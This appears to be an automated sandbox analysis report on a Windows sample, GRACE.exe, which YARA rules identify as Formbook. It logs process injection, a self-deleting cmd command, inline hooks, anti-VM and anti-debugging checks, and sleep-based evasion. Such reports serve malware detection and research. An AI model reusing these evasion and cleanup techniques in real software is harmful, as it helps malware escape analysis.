Source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameAddInProcess32.exeT vs GRACE.exe
Uses 32bit PE files
Source: GRACE.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623489927.0000000000F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327464918.0000000000EB0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295510880.0000000004197000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327302486.0000000000D80000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.621878003.0000000000D00000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000011.00000002.623260769.0000000000E70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.327086258.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.295698106.0000000004302000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 10.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: classification engine Classification label: mal100.troj.evad.winEXE@7/2@12/1
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\GRACE.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7040:120:WilError_01
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: GRACE.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GRACE.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\GRACE.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\GRACE.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: GRACE.exe Virustotal: Detection: 62%
Source: GRACE.exe Metadefender: Detection: 16%
Source: GRACE.exe ReversingLabs: Detection: 43%
Source: unknown Process created: C:\Users\user\Desktop\GRACE.exe 'C:\Users\user\Desktop\GRACE.exe'
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: unknown Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\GRACE.exe Process created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe C:\Users\user\AppData\Local\Temp\AddInProcess32.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\AddInProcess32.exe'
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32
Source: C:\Users\user\Desktop\GRACE.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: GRACE.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: GRACE.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: GRACE.exe Static file information: File size 3215360 > 1048576
Source: GRACE.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x310400
Source: GRACE.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
Source: Binary string: AddInProcess32.pdb source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp
Source: Binary string: netsh.pdb source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: AddInProcess32.exe, 0000000A.00000002.327825504.0000000001310000.00000040.00000001.sdmp, netsh.exe, 00000011.00000002.627626275.00000000037EF000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: AddInProcess32.exe, 0000000A.00000002.328311598.0000000001640000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: AddInProcess32.exe, netsh.exe
Source: Binary string: AddInProcess32.pdbpw source: GRACE.exe, 00000000.00000002.297040723.0000000008800000.00000004.00000001.sdmp, AddInProcess32.exe, 0000000A.00000000.284703831.00000000008E2000.00000002.00020000.sdmp, netsh.exe, 00000011.00000002.630581180.0000000003BFF000.00000004.00000001.sdmp, AddInProcess32.exe.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.315609957.000000000E1C0000.00000002.00000001.sdmp

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_004F050E push es; retf 0_2_004F0530
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_004F04A6 push es; retf 0_2_004F0530
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026388F0 pushfd ; retf 0_2_026388F1
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FC54A pushfd ; ret 0_2_026FC551
Source: C:\Users\user\Desktop\GRACE.exe Code function: 0_2_026FC511 push FFFFFF8Bh; iretd 0_2_026FC513
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CEB5 push eax; ret 10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF6C push eax; ret 10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF02 push eax; ret 10_2_0041CF08
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0041CF0B push eax; ret 10_2_0041CF72
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0138D0D1 push ecx; ret 10_2_0138D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_0374D0D1 push ecx; ret 17_2_0374D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1D856 push esi; ret 17_2_00D1D859
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CEB5 push eax; ret 17_2_00D1CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF6C push eax; ret 17_2_00D1CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF02 push eax; ret 17_2_00D1CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 17_2_00D1CF0B push eax; ret 17_2_00D1CF72

Persistence and Installation Behavior:

Drops PE files
Source: C:\Users\user\Desktop\GRACE.exe File created: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Users\user\Desktop\GRACE.exe File opened: C:\Users\user\Desktop\GRACE.exe\:Zone.Identifier read attributes | delete
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8F 0xFE 0xE3
Source: C:\Users\user\Desktop\GRACE.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000D098E4 second address: 0000000000D098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000D09B5E second address: 0000000000D09B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409A90 rdtsc 10_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\GRACE.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\GRACE.exe Window / User API: threadDelayed 685
Source: C:\Users\user\Desktop\GRACE.exe Window / User API: threadDelayed 9173
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 Thread sleep time: -9223372036854770s >= -30000s
Source: C:\Users\user\Desktop\GRACE.exe TID: 6852 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 Thread sleep count: 685 > 30
Source: C:\Users\user\Desktop\GRACE.exe TID: 6856 Thread sleep count: 9173 > 30
Source: C:\Windows\explorer.exe TID: 1260 Thread sleep time: -92000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 3476 Thread sleep time: -100000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: VMware
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware svga
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: tpautoconnsvc#Microsoft Hyper-V
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: cmd.txtQEMUqemu
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmsrvc
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware sata5vmware usb pointing device-vmware vmci bus deviceCvmware virtual s scsi disk device
Source: explorer.exe, 00000010.00000000.305340019.0000000005603000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b},
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: virtual-vmware pointing device
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000010.00000002.637677644.0000000004DF3000.00000004.00000001.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#5&L
Source: explorer.exe, 00000010.00000000.309365521.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmware
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmusrvc
Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}V*(E
Source: explorer.exe, 00000010.00000000.310221378.000000000871F000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}~
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vmtools
Source: explorer.exe, 00000010.00000000.310539218.00000000087D1000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00ices
Source: GRACE.exe, 00000000.00000002.295354303.0000000003851000.00000004.00000001.sdmp Binary or memory string: vboxservicevbox)Microsoft Virtual PC
Source: explorer.exe, 00000010.00000002.638572944.00000000055D0000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWw5%SystemRoot%\system32\mswsock.dllP1
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: GRACE.exe, 00000000.00000002.296291104.0000000004F60000.00000002.00000001.sdmp, explorer.exe, 00000010.00000000.308811774.0000000008220000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\GRACE.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_00409A90 rdtsc 10_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0040ACD0 LdrLoadDll, 10_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136513A mov eax, dword ptr fs:[00000030h] 10_2_0136513A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov eax, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01354120 mov ecx, dword ptr fs:[00000030h] 10_2_01354120
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339100 mov eax, dword ptr fs:[00000030h] 10_2_01339100
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B171 mov eax, dword ptr fs:[00000030h] 10_2_0133B171
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133C962 mov eax, dword ptr fs:[00000030h] 10_2_0133C962
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B944 mov eax, dword ptr fs:[00000030h] 10_2_0135B944
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B51BE mov eax, dword ptr fs:[00000030h] 10_2_013B51BE
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov ecx, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013599BF mov eax, dword ptr fs:[00000030h] 10_2_013599BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013661A0 mov eax, dword ptr fs:[00000030h] 10_2_013661A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F49A4 mov eax, dword ptr fs:[00000030h] 10_2_013F49A4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B69A6 mov eax, dword ptr fs:[00000030h] 10_2_013B69A6
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01362990 mov eax, dword ptr fs:[00000030h] 10_2_01362990
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136A185 mov eax, dword ptr fs:[00000030h] 10_2_0136A185
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135C182 mov eax, dword ptr fs:[00000030h] 10_2_0135C182
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0133B1E1 mov eax, dword ptr fs:[00000030h] 10_2_0133B1E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013C41E8 mov eax, dword ptr fs:[00000030h] 10_2_013C41E8
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A830 mov eax, dword ptr fs:[00000030h] 10_2_0135A830
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136002D mov eax, dword ptr fs:[00000030h] 10_2_0136002D
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0134B02A mov eax, dword ptr fs:[00000030h] 10_2_0134B02A
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B7016 mov eax, dword ptr fs:[00000030h] 10_2_013B7016
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01401074 mov eax, dword ptr fs:[00000030h] 10_2_01401074
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F2073 mov eax, dword ptr fs:[00000030h] 10_2_013F2073
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01404015 mov eax, dword ptr fs:[00000030h] 10_2_01404015
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01350050 mov eax, dword ptr fs:[00000030h] 10_2_01350050
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov ecx, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0136F0BF mov eax, dword ptr fs:[00000030h] 10_2_0136F0BF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013620A0 mov eax, dword ptr fs:[00000030h] 10_2_013620A0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013790AF mov eax, dword ptr fs:[00000030h] 10_2_013790AF
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01339080 mov eax, dword ptr fs:[00000030h] 10_2_01339080
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h] 10_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013B3884 mov eax, dword ptr fs:[00000030h] 10_2_013B3884
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h] 10_2_0135B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135B8E4 mov eax, dword ptr fs:[00000030h] 10_2_0135B8E4
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013340E1 mov eax, dword ptr fs:[00000030h] 10_2_013340E1
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013358EC mov eax, dword ptr fs:[00000030h] 10_2_013358EC
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov ecx, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013CB8D0 mov eax, dword ptr fs:[00000030h] 10_2_013CB8D0
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_01408B58 mov eax, dword ptr fs:[00000030h] 10_2_01408B58
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_013F131B mov eax, dword ptr fs:[00000030h] 10_2_013F131B
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exe Code function: 10_2_0135A309 mov eax, dword ptr fs:[00000030h] 10_2_0135A309
